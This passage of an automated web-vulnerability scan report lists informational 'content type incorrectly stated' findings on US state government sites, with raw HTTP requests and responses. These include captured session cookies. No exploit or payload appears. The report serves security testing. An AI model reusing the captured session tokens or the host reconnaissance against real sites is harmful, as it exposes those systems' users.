Status: 200 OK
X-Transaction: 1304201389-14067-45168
X-RateLimit-Limit: 150
ETag: "e06b964ca24b2a2497226c8b329ffbf0"-gzip
Last-Modified: Sat, 30 Apr 2011 22:09:49 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.01777
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114bef0a1d7
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-RateLimit-Reset: 1304204988
Set-Cookie: original_referer=VfnNLgwEGLSuRLn%2BI4bJUDQYE4KvXy2z; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCPfjdagvAToHaWQiJTgzODM5NWFlOTUzMTg3%250ANGU2ZmIwMWIwZWM3ODg2MDhkIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a5e2d1598668a8743609bd646837b6552e8a9ae7; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Length: 21

twitterCallback2([]);

30.212. http://urls.api.twitter.com/1/urls/count.json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://urls.api.twitter.com
Path:   /1/urls/count.json

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /1/urls/count.json HTTP/1.1
Host: urls.api.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.551233229.1303561994.1303561994.1303568398.2; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJSKHKYvASIKZmxhc2hJQzonQWN0aW9uQ29u%250AdHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJTlj%250AOTFkZjM3NjZlNmNmMjNkZTRhN2I0NGRiZTlmN2Yy--0d519c459eb1d8787cd1131396dfeb7154985001; k=173.193.214.243.1303823909896550;

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "6599c6d212c5eb6e41d800b7f8bf7397:1284511129"
Last-Modified: Wed, 15 Sep 2010 00:38:49 GMT
Accept-Ranges: bytes
Content-Length: 95
Content-Type: text/plain
Date: Sat, 30 Apr 2011 12:28:53 GMT
Connection: close
X-N: S

twttr.receiveCount({"errors":[{"code":48,"message":"Unable to access URL counting services"}]})

30.213. http://wbtdcs.nara.gov/wtid.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://wbtdcs.nara.gov
Path:   /wtid.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /wtid.js HTTP/1.1
Host: wbtdcs.nara.gov
Proxy-Connection: keep-alive
Referer: http://www.archives.gov/veterans/evetrecs/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:48:40 GMT
Server: Apache
Location: G:/Program Files/Webtrends/SmartSource Data Collector/util/content/wt_wtid.js
Content-Length: 10
Connection: close
Content-Type: application/x-javascript
Expires: Sat, 30 Apr 2011 00:48:40 GMT

<!-- -->

30.214. https://www.accesskansas.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.accesskansas.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.accesskansas.org
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerAPTCS03=755898796.38943.0000; BIGipServerSEC-01=RlI42CO99XZ0pkZi2/r4yXnQdKxpyuX4tX5u6oa50GehoO6ZH/bk9aewHnsaDJGTV5ffMB3VT8faNEQ=

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:22:54 GMT
Server: Apache
Last-Modified: Thu, 07 Sep 2006 17:40:25 GMT
ETag: "431a15-e36-9632b440"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h...&... ..............(....... ...........@...................................J...............e.......!...v...=.......u...........Y...y... ...H...............................#...8...K.
...[SNIP]...

30.215. http://www.alabama.gov/portal/common/subNav.jsp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.alabama.gov
Path:   /portal/common/subNav.jsp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /portal/common/subNav.jsp?id=residents HTTP/1.1
Host: www.alabama.gov
Proxy-Connection: keep-alive
Referer: http://www.alabama.gov/portal/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=abcO_ZAyy7h8HceqB1J_s

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:36:35 GMT
Server: Apache/1.3.41 (Unix) Resin/3.0.25
Content-Type: text/html; charset=iso-8859-1
Content-Length: 3659


<ul id="navsub">

<li>

<a href="secondary.jsp?id=transportation">Automobiles &amp; Transportation</a>


...[SNIP]...

30.216. http://www.colorado.gov/cs/Satellite  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.colorado.gov
Path:   /cs/Satellite

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /cs/Satellite?blobcol=urldata&blobkey=id&blobtable=MungoBlobs&blobwhere=1251607525840&ssbinary=true HTTP/1.1
Host: www.colorado.gov
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=3920A9A4131871B53676E0AC96532A74; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; BIGipServer=348127242.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:13:34 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sat, 30 Apr 2011 11:13:34 GMT
Content-Type: image/gif
Set-Cookie: JSESSIONID=D5AE58D8BD035AECA1B64AA51BBA5FBB; Path=/cs
Set-Cookie: SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; Path=/
Set-Cookie: BIGipServer=297861130.36895.0000; Path=/
Content-Length: 9136

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...

30.217. http://www.coloradochannel.net/sites/all/themes/cochannel/webfontkit/metaplus_bold_caps-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.coloradochannel.net
Path:   /sites/all/themes/cochannel/webfontkit/metaplus_bold_caps-webfont.woff

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /sites/all/themes/cochannel/webfontkit/metaplus_bold_caps-webfont.woff HTTP/1.1
Host: www.coloradochannel.net
Proxy-Connection: keep-alive
Referer: http://www.coloradochannel.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS8c46cefb3d49ee625c6d0242934806ee=pr3o6cnkqcgvda1n4st4t8ob24; has_js=1

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:32:55 GMT
Server: Apache
Last-Modified: Wed, 15 Dec 2010 21:31:26 GMT
ETag: "f41db-39d4-49779a8d1c780"
Accept-Ranges: bytes
Content-Length: 14804
Content-Type: text/plain

wOFF......9.......V<........................FFTM...l........Z\x.GDEF........... ....OS/2.......E...V^.a.cmap............b...cvt .......(...(.?..fpgm...........e../.gasp................glyf......,...E
...[SNIP]...

30.218. http://www.coloradochannel.net/sites/all/themes/cochannel/webfontkit/metaplus_medium_caps-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.coloradochannel.net
Path:   /sites/all/themes/cochannel/webfontkit/metaplus_medium_caps-webfont.woff

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /sites/all/themes/cochannel/webfontkit/metaplus_medium_caps-webfont.woff HTTP/1.1
Host: www.coloradochannel.net
Proxy-Connection: keep-alive
Referer: http://www.coloradochannel.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS8c46cefb3d49ee625c6d0242934806ee=pr3o6cnkqcgvda1n4st4t8ob24; has_js=1

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:32:59 GMT
Server: Apache
Last-Modified: Wed, 15 Dec 2010 21:31:26 GMT
ETag: "f41d2-3ddc-49779a8d1c780"
Accept-Ranges: bytes
Content-Length: 15836
Content-Type: text/plain

wOFF......=.......Z.........................FFTM...l........Z\x.GDEF........... ....OS/2.......E...V^.a.cmap............m..)cvt .......2...2....fpgm...........e../.gasp................glyf......0...I.
...[SNIP]...

30.219. http://www.delaware.gov/images/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.delaware.gov
Path:   /images/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /images/favicon.ico HTTP/1.1
Host: www.delaware.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:37:38 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 29 Mar 2011 19:49:07 GMT
ETag: "13801c4-37e-49fa45a6712c0"
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...........@.............................................................................................................................................................
...[SNIP]...

30.220. http://www.delaware.gov/pipe/logos/blog_blog_gis.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.delaware.gov
Path:   /pipe/logos/blog_blog_gis.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /pipe/logos/blog_blog_gis.gif HTTP/1.1
Host: www.delaware.gov
Proxy-Connection: keep-alive
Referer: http://de.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:50:47 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 29 Apr 2011 22:30:13 GMT
ETag: "3788039-1859-4a216379f2740"
Accept-Ranges: bytes
Content-Length: 6233
Connection: close
Content-Type: image/gif

.PNG
.
...IHDR...2...2......?..... IDATh.=.g.%.q.?....W<Y..K...`.    B..9c\...[...60p.$..@w.~...S.....+......|......b..Y.R.    U..#8...H.H....{...W.-..<.OH...-M.3mj.M.k;...L..~.%I.3.....{OQ.,....;.~u....5
...[SNIP]...

30.221. http://www.ehawaii.gov/dakine/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ehawaii.gov
Path:   /dakine/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a JPEG image.

Request

GET /dakine/favicon.ico HTTP/1.1
Host: www.ehawaii.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=211CBB8D2CA7B056E50344EEB3D7AB0B.lono; __utma=180588659.1320072404.1304201425.1304201425.1304201425.1; __utmb=180588659; __utmc=180588659; __utmz=180588659.1304201425.1.1.utmccn=(referral)|utmcsr=hawaii.gov|utmcct=/|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:10:38 GMT
Server: Apache-Coyote/1.1
ETag: W/"893-1180644910000"
Last-Modified: Thu, 31 May 2007 20:55:10 GMT
Content-Length: 893
Content-Type: text/plain

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...

30.222. http://www.employment.oregon.gov/js/oc-resources/marquee.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.employment.oregon.gov
Path:   /js/oc-resources/marquee.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /js/oc-resources/marquee.js HTTP/1.1
Host: www.employment.oregon.gov
Proxy-Connection: keep-alive
Referer: http://www.employment.oregon.gov/EMPLOY/ES/JOB/index.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=261762387.1304162104.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=191747134.1304162680.1.1.utmcsr=oregon.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=191747134.456701722.1304162680.1304162680.1304162680.1; __utma=261762387.973826526.1304162104.1304162104.1304201413.2; __utmc=261762387; __utmb=261762387.3.10.1304201413

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:18:12 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 26 Oct 2006 17:02:40 GMT
ETag: "8c5b80-1a96-420b9c56aec00"
Accept-Ranges: bytes
Content-Length: 6806
Cache-Control: max-age=28800
Expires: Sun, 01 May 2011 06:18:12 GMT
Content-Type: application/x-javascript

if(!window.vdt_doc_effects)vdt_doc_effects=new Object();z1=false;z2=null;z3=new Object();vs_timers=new Object();z4=false;ulm_base="http://www.opencube.com/vim5.1/";ulm_ie=window.showHelp;ulm_opera=win
...[SNIP]...

30.223. http://www.georgiawildlife.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.georgiawildlife.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.georgiawildlife.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSb3425e6a829e62b2674e77ae2f9b9d89=8vkabgoe8fgoe50a4tvs8s22u3; has_js=1; __utmz=47653809.1304125303.1.1.utmcsr=georgia.gov|utmccn=(referral)|utmcmd=referral|utmcct=/external/; __utma=47653809.712167714.1304125303.1304125303.1304125303.1; __utmc=47653809; __utmb=47653809.1.10.1304125303

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:01:23 GMT
Server: Apache/2.0.55 (Red Hat)
Last-Modified: Thu, 20 Jul 2006 22:10:52 GMT
ETag: "9b851e-e36-a72db300"
Accept-Ranges: bytes
Content-Length: 3638
Cache-Control: max-age=1209600
Expires: Sat, 14 May 2011 01:01:23 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

...... ..........&...........h.......(... ...@............................................................................................................................//..SS..kg.................
...[SNIP]...

30.224. http://www.hoosierdata.in.gov/nav.asp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.hoosierdata.in.gov
Path:   /nav.asp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /nav.asp HTTP/1.1
Host: www.hoosierdata.in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 30 Apr 2011 12:38:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 339
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSABRADTD=KEJNAPOBIJKGDMMBEBBIDPGE; path=/
Cache-control: private

<font face="Arial" size=2>
<p>ADODB.Field</font> <font face="Arial" size=2>error '800a0bcd'</font>
<p>
<font face="Arial" size=2>Either BOF or EOF is True, or the current record has been deleted. Req
...[SNIP]...

30.225. http://www.in.gov/dwd/2217.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.in.gov
Path:   /dwd/2217.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /dwd/2217.js HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:53 GMT
Server: Apache
Last-Modified: Thu, 13 Jan 2011 14:16:24 GMT
ETag: "568d66-47d-499baf66abe00"
Accept-Ranges: bytes
Content-Length: 1149
Content-Type: application/javascript
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:04:53 GMT; path=/

...<a href="/dwd/2554.js">anc_JQuery_Javascript</a>">
<a href="/dwd/2555.js">anc_Expander_Javascript</a>">

$(document).ready(function() {
// override some default options
$('div#col2 p.more')
...[SNIP]...

30.226. http://www.kansas.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.kansas.gov
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.kansas.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252547987.1365901713.1304162006.1304162006.1304162006.1; __utmb=252547987; __utmc=252547987; __utmz=252547987.1304162006.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:13:41 GMT
Server: Apache
Last-Modified: Wed, 06 Sep 2006 02:09:36 GMT
ETag: "e36fb-e36-777f3800"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h...&... ..............(....... ...........@...................................J...............e.......!...v...=.......u...........Y...y... ...H...............................#...8...K.
...[SNIP]...

30.227. http://www.legis.state.pa.us/cfdocs/legis/PN/Public/btCheck.cfm  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.legis.state.pa.us
Path:   /cfdocs/legis/PN/Public/btCheck.cfm

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /cfdocs/legis/PN/Public/btCheck.cfm HTTP/1.1
Host: www.legis.state.pa.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:39:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


   Missing Parameters.
   

30.228. http://www.michigan.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.michigan.gov
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.michigan.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:37:35 GMT
Server: IBM_HTTP_Server
Last-Modified: Sat, 11 Dec 2004 08:15:42 GMT
ETag: "1a1c-57e-ad620780"
Accept-Ranges: bytes
Content-Length: 1406
Cache-Control: public, max-age=86400
Content-Type: text/plain

..............h.......(....... ................................................x...Z...<..........................o.o.W.W.@.@..................w...Z...=... ..........s...d...U...F.o.7.W.(.@...........
...[SNIP]...

30.229. http://www.michigan.gov/images/Banner_81725_7.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.michigan.gov
Path:   /images/Banner_81725_7.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/Banner_81725_7.jpg HTTP/1.1
Host: www.michigan.gov
Proxy-Connection: keep-alive
Referer: http://www.michigan.gov/taxes/0,1607,7-238-43513-157514--,00.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:31:29 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 22 Dec 2006 14:07:06 GMT
ETag: "134755-3109-f67f3680"
Accept-Ranges: bytes
Content-Length: 12553
Cache-Control: public, max-age=86400
Content-Type: image/jpeg

GIF89aE.H.....f.......mmg.f.e]Y.rjUII....jZA:8..z..........]Q...tok...f.f#).u.s..W......?.9...}RI......v.v..:.........O.H..s.y..../.+....yo................sllcR..............t.o....jJ=................
...[SNIP]...

30.230. http://www.michigan.gov/images/E-file_81726_7.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.michigan.gov
Path:   /images/E-file_81726_7.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/E-file_81726_7.jpg HTTP/1.1
Host: www.michigan.gov
Proxy-Connection: keep-alive
Referer: http://www.michigan.gov/taxes/0,1607,7-238-43513-157514--,00.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:31:29 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 21 Dec 2006 18:01:13 GMT
ETag: "31af3-378-1dec0c40"
Accept-Ranges: bytes
Content-Length: 888
Cache-Control: public, max-age=86400
Content-Type: image/jpeg

GIF89a........f.......h.h...?.9..........s....y..........O.H....o..../.+..............._.V...o.e............!.......,............6.di.h..l..p,.tm.x..|....pH,....r.l:..(.$.Z...v..r...x,......j^.+.x.S.
...[SNIP]...

30.231. http://www.michigan.gov/images/FAQs_81728_7.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.michigan.gov
Path:   /images/FAQs_81728_7.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/FAQs_81728_7.jpg HTTP/1.1
Host: www.michigan.gov
Proxy-Connection: keep-alive
Referer: http://www.michigan.gov/taxes/0,1607,7-238-43513-157514--,00.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:31:29 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 21 Dec 2006 18:02:09 GMT
ETag: "31c36-242-21428a40"
Accept-Ranges: bytes
Content-Length: 578
Cache-Control: public, max-age=86400
Content-Type: image/jpeg

GIF89a.......f.......h.h....../.+.s............O.H.y...........o....?.9............o.e_.V..................!.......,........... .di.h..l..p,.tm.E..|....pH,.y..r.l:...tJ.....v..r..X\.Y....1..s.....
...[SNIP]...

30.232. http://www.michigan.gov/images/Forms_81729_7.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.michigan.gov
Path:   /images/Forms_81729_7.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/Forms_81729_7.jpg HTTP/1.1
Host: www.michigan.gov
Proxy-Connection: keep-alive
Referer: http://www.michigan.gov/taxes/0,1607,7-238-43513-157514--,00.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:31:30 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 21 Dec 2006 18:02:53 GMT
ETag: "31f53-291-23e1ed40"
Accept-Ranges: bytes
Content-Length: 657
Cache-Control: public, max-age=86400
Content-Type: image/jpeg

GIF89a........f.......j.j..._.V.s.../.+......................o..........?.9..........y....O.H.........o.e...!.......,............ .di.h..l..j#7Wm.x......Zmp(....r.l:...T)J$.. .8.z...TD.T...W.n..H.#SN
...[SNIP]...

30.233. http://www.mo.gov/wp-content/themes/Mo.gov/bavicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mo.gov
Path:   /wp-content/themes/Mo.gov/bavicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /wp-content/themes/Mo.gov/bavicon.ico HTTP/1.1
Host: www.mo.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
